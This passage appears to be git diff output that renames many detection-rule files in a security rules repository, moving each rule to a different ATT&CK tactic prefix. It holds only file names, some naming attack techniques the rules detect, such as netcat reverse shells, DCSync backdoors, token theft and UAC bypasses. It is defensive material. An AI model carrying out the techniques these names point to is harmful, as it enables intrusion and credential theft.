rules/integrations/azure/{credential_access_key_vault_excessive_retrieval.toml => collection_key_vault_excessive_retrieval.toml} (100%) rename rules/integrations/azure/{initial_access_azure_arc_cluster_credential_access_unusual_source.toml => 
credential_access_azure_arc_cluster_credential_access_unusual_source.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_illicit_consent_grant_via_registered_application.toml => credential_access_entra_id_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml => credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml => credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_protection_sign_in_risk_detected.toml => credential_access_entra_id_protection_sign_in_risk_detected.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml => credential_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} (100%) rename rules/integrations/azure/{discovery_entra_id_teamfiltration_user_agents_detected.toml => credential_access_entra_id_teamfiltration_user_agents_detected.toml} (100%) rename rules/integrations/azure/{persistence_automation_account_created.toml => defense_evasion_automation_account_created.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_actor_token_user_impersonation_abuse.toml => defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_conditional_access_policy_modified.toml => defense_evasion_entra_id_conditional_access_policy_modified.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_device_code_auth_with_broker_client.toml => defense_evasion_entra_id_device_code_auth_with_broker_client.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_federated_login_by_unusual_client.toml => 
defense_evasion_entra_id_federated_login_by_unusual_client.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_graph_single_session_from_multiple_addresses.toml => defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_mfa_disabled_for_user.toml => defense_evasion_entra_id_mfa_disabled_for_user.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_privileged_identity_management_role_modified.toml => defense_evasion_entra_id_privileged_identity_management_role_modified.toml} (100%) rename rules/integrations/azure/{initial_access_entra_id_rare_app_id_for_principal_auth.toml => defense_evasion_entra_id_rare_app_id_for_principal_auth.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_tenant_domain_federation_via_audit_logs.toml => defense_evasion_entra_id_tenant_domain_federation_via_audit_logs.toml} (100%) rename rules/integrations/azure/{persistence_graph_eam_addition_or_modification.toml => defense_evasion_graph_eam_addition_or_modification.toml} (100%) rename rules/integrations/azure/{initial_access_graph_first_occurrence_of_client_request.toml => defense_evasion_graph_first_occurrence_of_client_request.toml} (100%) rename rules/integrations/azure/{discovery_storage_blob_container_access_modification.toml => defense_evasion_storage_blob_container_access_modification.toml} (100%) rename rules/integrations/azure/{persistence_entra_id_user_signed_in_from_unusual_device.toml => initial_access_entra_id_user_signed_in_from_unusual_device.toml} (100%) rename rules/integrations/azure/{privilege_escalation_azure_rbac_administrator_roles_assigned.toml => persistence_azure_rbac_administrator_roles_assigned.toml} (100%) rename rules/integrations/azure/{privilege_escalation_entra_id_elevate_to_user_administrator_access.toml => persistence_entra_id_elevate_to_user_administrator_access.toml} (100%) rename 
rules/integrations/azure/{initial_access_entra_id_external_guest_user_invite.toml => persistence_entra_id_external_guest_user_invite.toml} (100%) rename rules/integrations/azure/{privilege_escalation_kubernetes_aks_rolebinding_created.toml => persistence_kubernetes_aks_rolebinding_created.toml} (100%) rename rules/integrations/azure/{credential_access_storage_account_key_regenerated.toml => persistence_storage_account_key_regenerated.toml} (100%) rename rules/integrations/ded/{exfiltration_ml_high_bytes_destination_port.toml => command_and_control_ml_high_bytes_destination_port.toml} (100%) rename rules/integrations/gcp/{exfiltration_gcp_logging_sink_modification.toml => defense_evasion_gcp_logging_sink_modification.toml} (100%) rename rules/integrations/gcp/{persistence_gcp_iam_service_account_key_deletion.toml => impact_gcp_iam_service_account_key_deletion.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_pub_sub_subscription_deletion.toml => impact_gcp_pub_sub_subscription_deletion.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_pub_sub_topic_deletion.toml => impact_gcp_pub_sub_topic_deletion.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_virtual_private_cloud_network_deleted.toml => impact_gcp_virtual_private_cloud_network_deleted.toml} (100%) rename rules/integrations/gcp/{initial_access_gcp_iam_custom_role_creation.toml => persistence_gcp_iam_custom_role_creation.toml} (100%) rename rules/integrations/gcp/{defense_evasion_gcp_storage_bucket_permissions_modified.toml => persistence_gcp_storage_bucket_permissions_modified.toml} (100%) rename rules/integrations/github/{execution_github_high_number_of_cloned_repos_from_pat.toml => collection_github_high_number_of_cloned_repos_from_pat.toml} (100%) rename rules/integrations/github/{impact_github_repository_activity_from_unusual_ip.toml => collection_github_repository_activity_from_unusual_ip.toml} (100%) rename 
rules/integrations/github/{exfiltration_high_number_of_cloning_by_user.toml => collection_high_number_of_cloning_by_user.toml} (100%) rename rules/integrations/github/{execution_github_app_deleted.toml => defense_evasion_github_app_deleted.toml} (100%) rename rules/integrations/github/{initial_access_github_actions_bot_first_push_to_repo.toml => impact_github_actions_bot_first_push_to_repo.toml} (100%) rename rules/integrations/github/{execution_new_github_app_installed.toml => persistence_new_github_app_installed.toml} (100%) rename rules/integrations/google_workspace/{credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml => collection_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml} (100%) rename rules/integrations/google_workspace/{impact_google_workspace_mfa_enforcement_disabled.toml => credential_access_google_workspace_mfa_enforcement_disabled.toml} (100%) rename rules/integrations/google_workspace/{persistence_google_workspace_2sv_policy_disabled.toml => defense_evasion_google_workspace_2sv_policy_disabled.toml} (100%) rename rules/integrations/google_workspace/{persistence_google_workspace_password_policy_modified.toml => defense_evasion_google_workspace_password_policy_modified.toml} (100%) rename rules/integrations/google_workspace/{persistence_mfa_disabled_for_google_workspace_organization.toml => defense_evasion_mfa_disabled_for_google_workspace_organization.toml} (100%) rename rules/integrations/google_workspace/{initial_access_object_copied_to_external_drive_with_app_consent.toml => execution_object_copied_to_external_drive_with_app_consent.toml} (100%) rename rules/integrations/google_workspace/{collection_google_drive_ownership_transferred_via_google_workspace.toml => exfiltration_google_drive_ownership_transferred_via_google_workspace.toml} (100%) rename rules/integrations/google_workspace/{initial_access_external_user_added_to_google_workspace_group.toml => 
persistence_external_user_added_to_google_workspace_group.toml} (100%) rename rules/integrations/google_workspace/{initial_access_google_workspace_suspended_user_renewed.toml => persistence_google_workspace_suspended_user_renewed.toml} (100%) rename rules/integrations/kubernetes/{discovery_denied_service_account_request.toml => defense_evasion_denied_service_account_request.toml} (100%) rename rules/integrations/kubernetes/{execution_forbidden_request_from_unsual_user_agent.toml => discovery_forbidden_request_from_unsual_user_agent.toml} (100%) rename rules/integrations/kubernetes/{execution_unusual_request_response_by_user_agent.toml => discovery_unusual_request_response_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_container_created_with_excessive_linux_capabilities.toml => execution_container_created_with_excessive_linux_capabilities.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_hostipc.toml => execution_pod_created_with_hostipc.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_hostnetwork.toml => execution_pod_created_with_hostnetwork.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_hostpid.toml => execution_pod_created_with_hostpid.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_pod_created_with_sensitive_hostpath_volume.toml => execution_pod_created_with_sensitive_hostpath_volume.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_privileged_pod_created.toml => execution_privileged_pod_created.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml => execution_sensitive_rbac_change_followed_by_workload_modification.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_sensitive_workload_modification_by_user_agent.toml => 
execution_sensitive_workload_modification_by_user_agent.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_suspicious_assignment_of_controller_service_account.toml => execution_suspicious_assignment_of_controller_service_account.toml} (100%) rename rules/integrations/kubernetes/{persistence_exposed_service_created_with_type_nodeport.toml => initial_access_exposed_service_created_with_type_nodeport.toml} (100%) rename rules/integrations/kubernetes/{privilege_escalation_service_account_rbac_write_operation.toml => persistence_service_account_rbac_write_operation.toml} (100%) rename rules/integrations/kubernetes/{execution_forbidden_creation_request.toml => privilege_escalation_forbidden_creation_request.toml} (100%) rename rules/integrations/lmd/{lateral_movement_ml_high_mean_rdp_process_args.toml => execution_ml_high_mean_rdp_process_args.toml} (100%) rename rules/integrations/lmd/{lateral_movement_ml_spike_in_remote_file_transfers.toml => exfiltration_ml_spike_in_remote_file_transfers.toml} (100%) rename rules/integrations/o365/{exfiltration_exchange_transport_rule_creation.toml => collection_exchange_transport_rule_creation.toml} (100%) rename rules/integrations/o365/{discovery_sharepoint_sensitive_term_search.toml => collection_sharepoint_sensitive_term_search.toml} (100%) rename rules/integrations/o365/{initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml => credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml} (100%) rename rules/integrations/o365/{initial_access_identity_unusual_sso_errors_for_user.toml => credential_access_identity_unusual_sso_errors_for_user.toml} (100%) rename rules/integrations/o365/{privilege_escalation_exchange_new_or_modified_federation_domain.toml => defense_evasion_exchange_new_or_modified_federation_domain.toml} (100%) rename rules/integrations/o365/{exfiltration_exchange_transport_rule_modification.toml => 
defense_evasion_exchange_transport_rule_modification.toml} (100%) rename rules/integrations/o365/{initial_access_identity_illicit_consent_grant_via_registered_application.toml => persistence_identity_illicit_consent_grant_via_registered_application.toml} (100%) rename rules/integrations/o365/{privilege_escalation_sharepoint_site_collection_admin_added.toml => persistence_sharepoint_site_collection_admin_added.toml} (100%) rename rules/integrations/okta/{persistence_mfa_deactivation_with_no_reactivation.toml => defense_evasion_mfa_deactivation_with_no_reactivation.toml} (100%) rename rules/integrations/okta/{lateral_movement_multiple_sessions_for_single_user.toml => defense_evasion_multiple_sessions_for_single_user.toml} (100%) rename rules/integrations/okta/{credential_access_multiple_user_agent_os_authentication.toml => defense_evasion_multiple_user_agent_os_authentication.toml} (100%) rename rules/integrations/okta/{credential_access_okta_aitm_session_cookie_replay.toml => defense_evasion_okta_aitm_session_cookie_replay.toml} (100%) rename rules/integrations/okta/{impact_okta_attempt_to_deactivate_okta_application.toml => defense_evasion_okta_attempt_to_deactivate_okta_application.toml} (100%) rename rules/integrations/okta/{impact_okta_attempt_to_modify_okta_application.toml => defense_evasion_okta_attempt_to_modify_okta_application.toml} (100%) rename rules/integrations/okta/{persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml => defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml} (100%) rename rules/integrations/okta/{initial_access_sign_in_events_via_third_party_idp.toml => defense_evasion_sign_in_events_via_third_party_idp.toml} (100%) rename rules/integrations/okta/{persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml => defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml} (100%) rename 
rules/integrations/okta/{initial_access_successful_application_sso_from_unknown_client_device.toml => defense_evasion_successful_application_sso_from_unknown_client_device.toml} (100%) rename rules/integrations/okta/{credential_access_user_impersonation_access.toml => defense_evasion_user_impersonation_access.toml} (100%) rename rules/integrations/okta/{defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml => initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml} (100%) rename rules/macos/{credential_access_high_volume_of_pbpaste.toml => collection_high_volume_of_pbpaste.toml} (100%) rename rules/macos/{defense_evasion_suspicious_tcc_access_granted.toml => collection_suspicious_tcc_access_granted.toml} (100%) rename rules/macos/{persistence_curl_execution_via_shell_profile.toml => command_and_control_curl_execution_via_shell_profile.toml} (100%) rename rules/macos/{execution_installer_package_spawned_network_event.toml => command_and_control_installer_package_spawned_network_event.toml} (100%) rename rules/macos/{execution_scripting_osascript_exec_followed_by_netcon.toml => command_and_control_scripting_osascript_exec_followed_by_netcon.toml} (100%) rename rules/macos/{persistence_account_creation_hide_at_logon.toml => defense_evasion_account_creation_hide_at_logon.toml} (100%) rename rules/macos/{persistence_evasion_hidden_launch_agent_deamon_creation.toml => defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml} (100%) rename rules/macos/{persistence_hidden_plist_filename.toml => defense_evasion_hidden_plist_filename.toml} (100%) rename rules/macos/{discovery_suspicious_sip_check.toml => defense_evasion_suspicious_sip_check.toml} (100%) rename rules/macos/{privilege_escalation_applescript_with_admin_privs.toml => execution_applescript_with_admin_privs.toml} (100%) rename rules/macos/{privilege_escalation_explicit_creds_via_scripting.toml => execution_explicit_creds_via_scripting.toml} (100%) rename 
rules/macos/{command_and_control_perl_outbound_network_connection.toml => execution_perl_outbound_network_connection.toml} (100%) rename rules/macos/{initial_access_suspicious_mac_ms_office_child_process.toml => execution_suspicious_mac_ms_office_child_process.toml} (100%) rename rules/macos/{lateral_movement_vpn_connection_attempt.toml => initial_access_vpn_connection_attempt.toml} (100%) rename rules/macos/{privilege_escalation_local_user_added_to_admin.toml => persistence_local_user_added_to_admin.toml} (100%) rename rules/macos/{lateral_movement_remote_ssh_login_enabled.toml => persistence_remote_ssh_login_enabled.toml} (100%) rename rules/macos/{privilege_escalation_root_crontab_filemod.toml => persistence_root_crontab_filemod.toml} (100%) rename rules/macos/{privilege_escalation_user_added_to_admin_group.toml => persistence_user_added_to_admin_group.toml} (100%) rename rules/ml/{execution_ml_windows_anomalous_script.toml => defense_evasion_ml_windows_anomalous_script.toml} (100%) rename rules/ml/{persistence_ml_rare_process_by_host_linux.toml => execution_ml_rare_process_by_host_linux.toml} (100%) rename rules/ml/{persistence_ml_windows_anomalous_path_activity.toml => execution_ml_windows_anomalous_path_activity.toml} (100%) rename rules/ml/{persistence_ml_windows_anomalous_process_creation.toml => execution_ml_windows_anomalous_process_creation.toml} (100%) rename rules/network/{initial_access_rpc_remote_procedure_call_to_the_internet.toml => command_and_control_rpc_remote_procedure_call_to_the_internet.toml} (100%) rename rules/network/{initial_access_react_server_components_rce_attempt.toml => execution_react_server_components_rce_attempt.toml} (100%) rename rules/network/{initial_access_smb_windows_file_sharing_activity_to_the_internet.toml => exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml} (100%) rename rules/network/{command_and_control_accepted_default_telnet_port_connection.toml => 
initial_access_accepted_default_telnet_port_connection.toml} (100%) rename rules/network/{command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml => initial_access_rdp_remote_desktop_protocol_from_the_internet.toml} (100%) rename rules/network/{command_and_control_vnc_virtual_network_computing_from_the_internet.toml => initial_access_vnc_virtual_network_computing_from_the_internet.toml} (100%) rename rules/network/{initial_access_unsecure_elasticsearch_node.toml => reconnaissance_unsecure_elasticsearch_node.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_cred_manipulation_detected.toml => defense_evasion_endgame_cred_manipulation_detected.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_cred_manipulation_prevented.toml => defense_evasion_endgame_cred_manipulation_prevented.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_permission_theft_detected.toml => defense_evasion_endgame_permission_theft_detected.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_permission_theft_prevented.toml => defense_evasion_endgame_permission_theft_prevented.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_process_injection_detected.toml => defense_evasion_endgame_process_injection_detected.toml} (100%) rename rules/promotions/{privilege_escalation_endgame_process_injection_prevented.toml => defense_evasion_endgame_process_injection_prevented.toml} (100%) rename rules/windows/{credential_access_adidns_wildcard.toml => collection_adidns_wildcard.toml} (100%) rename rules/windows/{credential_access_browsers_unusual_parent.toml => collection_browsers_unusual_parent.toml} (100%) rename rules/windows/{credential_access_dnsnode_creation.toml => collection_dnsnode_creation.toml} (100%) rename rules/windows/{credential_access_web_config_file_access.toml => collection_web_config_file_access.toml} (100%) rename rules/windows/{execution_command_prompt_connecting_to_the_internet.toml => 
command_and_control_command_prompt_connecting_to_the_internet.toml} (100%) rename rules/windows/{defense_evasion_msiexec_remote_payload.toml => command_and_control_msiexec_remote_payload.toml} (100%) rename rules/windows/{execution_revshell_cmd_via_netcat.toml => command_and_control_revshell_cmd_via_netcat.toml} (100%) rename rules/windows/{execution_scripting_remote_webdav.toml => command_and_control_scripting_remote_webdav.toml} (100%) rename rules/windows/{defense_evasion_suspicious_certutil_commands.toml => command_and_control_suspicious_certutil_commands.toml} (100%) rename rules/windows/{defense_evasion_unusual_network_connection_via_dllhost.toml => command_and_control_unusual_network_connection_via_dllhost.toml} (100%) rename rules/windows/{defense_evasion_unusual_network_connection_via_rundll32.toml => command_and_control_unusual_network_connection_via_rundll32.toml} (100%) rename rules/windows/{execution_posh_hacktool_functions.toml => credential_access_posh_hacktool_functions.toml} (100%) rename rules/windows/{exfiltration_smb_rare_destination.toml => credential_access_smb_rare_destination.toml} (100%) rename rules/windows/{lateral_movement_alternate_creds_pth.toml => defense_evasion_alternate_creds_pth.toml} (100%) rename rules/windows/{execution_com_object_xwizard.toml => defense_evasion_com_object_xwizard.toml} (100%) rename rules/windows/{execution_command_shell_via_rundll32.toml => defense_evasion_command_shell_via_rundll32.toml} (100%) rename rules/windows/{privilege_escalation_create_process_as_different_user.toml => defense_evasion_create_process_as_different_user.toml} (100%) rename rules/windows/{privilege_escalation_create_process_with_token_unpriv.toml => defense_evasion_create_process_with_token_unpriv.toml} (100%) rename rules/windows/{lateral_movement_dcom_mmc20.toml => defense_evasion_dcom_mmc20.toml} (100%) rename rules/windows/{execution_delayed_via_ping_lolbas_unsigned.toml => defense_evasion_delayed_via_ping_lolbas_unsigned.toml} 
(100%) rename rules/windows/{privilege_escalation_disable_uac_registry.toml => defense_evasion_disable_uac_registry.toml} (100%) rename rules/windows/{persistence_evasion_hidden_local_account_creation.toml => defense_evasion_evasion_hidden_local_account_creation.toml} (100%) rename rules/windows/{persistence_evasion_registry_startup_shell_folder_modified.toml => defense_evasion_evasion_registry_startup_shell_folder_modified.toml} (100%) rename rules/windows/{initial_access_evasion_suspicious_htm_file_creation.toml => defense_evasion_evasion_suspicious_htm_file_creation.toml} (100%) rename rules/windows/{privilege_escalation_expired_driver_loaded.toml => defense_evasion_expired_driver_loaded.toml} (100%) rename rules/windows/{initial_access_exploit_jetbrains_teamcity.toml => defense_evasion_exploit_jetbrains_teamcity.toml} (100%) rename rules/windows/{execution_from_unusual_path_cmdline.toml => defense_evasion_from_unusual_path_cmdline.toml} (100%) rename rules/windows/{execution_html_help_executable_program_connecting_to_the_internet.toml => defense_evasion_html_help_executable_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{privilege_escalation_krbrelayup_service_creation.toml => defense_evasion_krbrelayup_service_creation.toml} (100%) rename rules/windows/{privilege_escalation_make_token_local.toml => defense_evasion_make_token_local.toml} (100%) rename rules/windows/{persistence_msi_installer_task_startup.toml => defense_evasion_msi_installer_task_startup.toml} (100%) rename rules/windows/{privilege_escalation_newcreds_logon_rare_process.toml => defense_evasion_newcreds_logon_rare_process.toml} (100%) rename rules/windows/{execution_posh_portable_executable.toml => defense_evasion_posh_portable_executable.toml} (100%) rename rules/windows/{privilege_escalation_posh_token_impersonation.toml => defense_evasion_posh_token_impersonation.toml} (100%) rename rules/windows/{initial_access_potential_webhelpdesk_exploit.toml => 
defense_evasion_potential_webhelpdesk_exploit.toml} (100%) rename rules/windows/{privilege_escalation_printspooler_suspicious_file_deletion.toml => defense_evasion_printspooler_suspicious_file_deletion.toml} (100%) rename rules/windows/{lateral_movement_rdp_enabled_registry.toml => defense_evasion_rdp_enabled_registry.toml} (100%) rename rules/windows/{execution_register_server_program_connecting_to_the_internet.toml => defense_evasion_register_server_program_connecting_to_the_internet.toml} (100%) rename rules/windows/{persistence_sdprop_exclusion_dsheuristics.toml => defense_evasion_sdprop_exclusion_dsheuristics.toml} (100%) rename rules/windows/{persistence_services_registry.toml => defense_evasion_services_registry.toml} (100%) rename rules/windows/{initial_access_suspicious_execution_from_vscode_extension.toml => defense_evasion_suspicious_execution_from_vscode_extension.toml} (100%) rename rules/windows/{initial_access_suspicious_ms_office_child_process.toml => defense_evasion_suspicious_ms_office_child_process.toml} (100%) rename rules/windows/{execution_suspicious_psexesvc.toml => defense_evasion_suspicious_psexesvc.toml} (100%) rename rules/windows/{initial_access_suspicious_windows_server_update_svc.toml => defense_evasion_suspicious_windows_server_update_svc.toml} (100%) rename rules/windows/{privilege_escalation_tokenmanip_sedebugpriv_enabled.toml => defense_evasion_tokenmanip_sedebugpriv_enabled.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_com_clipup.toml => defense_evasion_uac_bypass_com_clipup.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_com_ieinstal.toml => defense_evasion_uac_bypass_com_ieinstal.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_com_interface_icmluautil.toml => defense_evasion_uac_bypass_com_interface_icmluautil.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_diskcleanup_hijack.toml => defense_evasion_uac_bypass_diskcleanup_hijack.toml} (100%) rename 
rules/windows/{privilege_escalation_uac_bypass_dll_sideloading.toml => defense_evasion_uac_bypass_dll_sideloading.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_event_viewer.toml => defense_evasion_uac_bypass_event_viewer.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_mock_windir.toml => defense_evasion_uac_bypass_mock_windir.toml} (100%) rename rules/windows/{privilege_escalation_uac_bypass_winfw_mmc_hijack.toml => defense_evasion_uac_bypass_winfw_mmc_hijack.toml} (100%) rename rules/windows/{privilege_escalation_unusual_parentchild_relationship.toml => defense_evasion_unusual_parentchild_relationship.toml} (100%) rename rules/windows/{privilege_escalation_unusual_svchost_childproc_childless.toml => defense_evasion_unusual_svchost_childproc_childless.toml} (100%) rename rules/windows/{initial_access_url_cve_2025_33053.toml => defense_evasion_url_cve_2025_33053.toml} (100%) rename rules/windows/{persistence_via_bits_job_notify_command.toml => defense_evasion_via_bits_job_notify_command.toml} (100%) rename rules/windows/{execution_via_compiled_html_file.toml => defense_evasion_via_compiled_html_file.toml} (100%) rename rules/windows/{persistence_via_hidden_run_key_valuename.toml => defense_evasion_via_hidden_run_key_valuename.toml} (100%) rename rules/windows/{execution_via_hidden_shell_conhost.toml => defense_evasion_via_hidden_shell_conhost.toml} (100%) rename rules/windows/{execution_via_mmc_console_file_unusual_path.toml => defense_evasion_via_mmc_console_file_unusual_path.toml} (100%) rename rules/windows/{privilege_escalation_via_token_theft.toml => defense_evasion_via_token_theft.toml} (100%) rename rules/windows/{execution_windows_cmd_shell_susp_args.toml => defense_evasion_windows_cmd_shell_susp_args.toml} (100%) rename rules/windows/{execution_windows_fakecaptcha_cmd_ps.toml => defense_evasion_windows_fakecaptcha_cmd_ps.toml} (100%) rename rules/windows/{execution_windows_powershell_susp_args.toml => 
defense_evasion_windows_powershell_susp_args.toml} (100%) rename rules/windows/{execution_windows_script_from_internet.toml => defense_evasion_windows_script_from_internet.toml} (100%) rename rules/windows/{initial_access_xsl_script_execution_via_com.toml => defense_evasion_xsl_script_execution_via_com.toml} (100%) rename rules/windows/{execution_enumeration_via_wmiprvse.toml => discovery_enumeration_via_wmiprvse.toml} (100%) rename rules/windows/{lateral_movement_cmd_service.toml => execution_cmd_service.toml} (100%) rename rules/windows/{lateral_movement_dcom_shellwindow_shellbrowserwindow.toml => execution_dcom_shellwindow_shellbrowserwindow.toml} (100%) rename rules/windows/{privilege_escalation_group_policy_scheduled_task.toml => execution_group_policy_scheduled_task.toml} (100%) rename rules/windows/{lateral_movement_incoming_wmi.toml => execution_incoming_wmi.toml} (100%) rename rules/windows/{initial_access_rdp_file_mail_attachment.toml => execution_rdp_file_mail_attachment.toml} (100%) rename rules/windows/{lateral_movement_remote_services.toml => execution_remote_services.toml} (100%) rename rules/windows/{lateral_movement_remote_task_creation_winlog.toml => execution_remote_task_creation_winlog.toml} (100%) rename rules/windows/{lateral_movement_scheduled_task_target.toml => execution_scheduled_task_target.toml} (100%) rename rules/windows/{initial_access_script_executing_powershell.toml => execution_script_executing_powershell.toml} (100%) rename rules/windows/{initial_access_scripts_process_started_via_wmi.toml => execution_scripts_process_started_via_wmi.toml} (100%) rename rules/windows/{privilege_escalation_service_control_spawned_script_int.toml => execution_service_control_spawned_script_int.toml} (100%) rename rules/windows/{initial_access_suspicious_ms_exchange_worker_child_process.toml => execution_suspicious_ms_exchange_worker_child_process.toml} (100%) rename rules/windows/{initial_access_suspicious_ms_outlook_child_process.toml => 
execution_suspicious_ms_outlook_child_process.toml} (100%) rename rules/windows/{defense_evasion_suspicious_process_access_direct_syscall.toml => execution_suspicious_process_access_direct_syscall.toml} (100%) rename rules/windows/{persistence_suspicious_scheduled_task_runtime.toml => execution_suspicious_scheduled_task_runtime.toml} (100%) rename rules/windows/{defense_evasion_suspicious_zoom_child_process.toml => execution_suspicious_zoom_child_process.toml} (100%) rename rules/windows/{persistence_system_shells_via_services.toml => execution_system_shells_via_services.toml} (100%) rename rules/windows/{persistence_temp_scheduled_task.toml => execution_temp_scheduled_task.toml} (100%) rename rules/windows/{initial_access_via_explorer_suspicious_child_parent_args.toml => execution_via_explorer_suspicious_child_parent_args.toml} (100%) rename rules/windows/{persistence_via_wmi_stdregprov_run_services.toml => execution_via_wmi_stdregprov_run_services.toml} (100%) rename rules/windows/{lateral_movement_via_wsus_update.toml => execution_via_wsus_update.toml} (100%) rename rules/windows/{persistence_via_xp_cmdshell_mssql_stored_procedure.toml => execution_via_xp_cmdshell_mssql_stored_procedure.toml} (100%) rename rules/windows/{impact_volume_shadow_copy_deletion_via_powershell.toml => execution_volume_shadow_copy_deletion_via_powershell.toml} (100%) rename rules/windows/{impact_volume_shadow_copy_deletion_via_wmic.toml => execution_volume_shadow_copy_deletion_via_wmic.toml} (100%) rename rules/windows/{persistence_webshell_detection.toml => execution_webshell_detection.toml} (100%) rename rules/windows/{initial_access_webshell_screenconnect_server.toml => execution_webshell_screenconnect_server.toml} (100%) rename rules/windows/{defense_evasion_wsl_bash_exec.toml => execution_wsl_bash_exec.toml} (100%) rename rules/windows/{privilege_escalation_account_takeover_mixed_logon_types.toml => initial_access_account_takeover_mixed_logon_types.toml} (100%) rename 
rules/windows/{execution_downloaded_shortcut_files.toml => initial_access_downloaded_shortcut_files.toml} (100%) rename rules/windows/{execution_downloaded_url_file.toml => initial_access_downloaded_url_file.toml} (100%) rename rules/windows/{privilege_escalation_takeover_new_source_ip.toml => initial_access_takeover_new_source_ip.toml} (100%) rename rules/windows/{lateral_movement_unusual_dns_service_children.toml => initial_access_unusual_dns_service_children.toml} (100%) rename rules/windows/{lateral_movement_unusual_dns_service_file_writes.toml => initial_access_unusual_dns_service_file_writes.toml} (100%) rename rules/windows/{privilege_escalation_badsuccessor_dmsa_abuse.toml => persistence_badsuccessor_dmsa_abuse.toml} (100%) rename rules/windows/{privilege_escalation_credroaming_ldap.toml => persistence_credroaming_ldap.toml} (100%) rename rules/windows/{credential_access_dcsync_user_backdoor.toml => persistence_dcsync_user_backdoor.toml} (100%) rename rules/windows/{privilege_escalation_dmsa_creation_by_unusual_user.toml => persistence_dmsa_creation_by_unusual_user.toml} (100%) rename rules/windows/{privilege_escalation_dns_serverlevelplugindll.toml => persistence_dns_serverlevelplugindll.toml} (100%) rename rules/windows/{privilege_escalation_gpo_schtask_service_creation.toml => persistence_gpo_schtask_service_creation.toml} (100%) rename rules/windows/{privilege_escalation_group_policy_iniscript.toml => persistence_group_policy_iniscript.toml} (100%) rename rules/windows/{privilege_escalation_lsa_auth_package.toml => persistence_lsa_auth_package.toml} (100%) rename rules/windows/{credential_access_lsass_loaded_susp_dll.toml => persistence_lsass_loaded_susp_dll.toml} (100%) rename rules/windows/{defense_evasion_masquerading_suspicious_werfault_childproc.toml => persistence_masquerading_suspicious_werfault_childproc.toml} (100%) rename rules/windows/{command_and_control_outlook_home_page.toml => persistence_outlook_home_page.toml} (100%) rename 
rules/windows/{privilege_escalation_port_monitor_print_processor_abuse.toml => persistence_port_monitor_print_processor_abuse.toml} (100%) rename rules/windows/{privilege_escalation_reg_service_imagepath_mod.toml => persistence_reg_service_imagepath_mod.toml} (100%) rename rules/windows/{defense_evasion_regmod_remotemonologue.toml => persistence_regmod_remotemonologue.toml} (100%) rename rules/windows/{defense_evasion_scheduledjobs_at_protocol_enabled.toml => persistence_scheduledjobs_at_protocol_enabled.toml} (100%) rename rules/windows/{credential_access_seenabledelegationprivilege_assigned_to_user.toml => persistence_seenabledelegationprivilege_assigned_to_user.toml} (100%) rename rules/windows/{credential_access_shadow_credentials.toml => persistence_shadow_credentials.toml} (100%) rename rules/windows/{execution_shared_modules_local_sxs_dll.toml => persistence_shared_modules_local_sxs_dll.toml} (100%) rename rules/windows/{credential_access_spn_attribute_modified.toml => persistence_spn_attribute_modified.toml} (100%) rename rules/windows/{privilege_escalation_windows_service_via_unusual_client.toml => persistence_windows_service_via_unusual_client.toml} (100%) rename rules_building_block/{execution_github_new_repo_interaction_for_pat.toml => collection_github_new_repo_interaction_for_pat.toml} (100%) rename rules_building_block/{execution_github_new_repo_interaction_for_user.toml => collection_github_new_repo_interaction_for_user.toml} (100%) rename 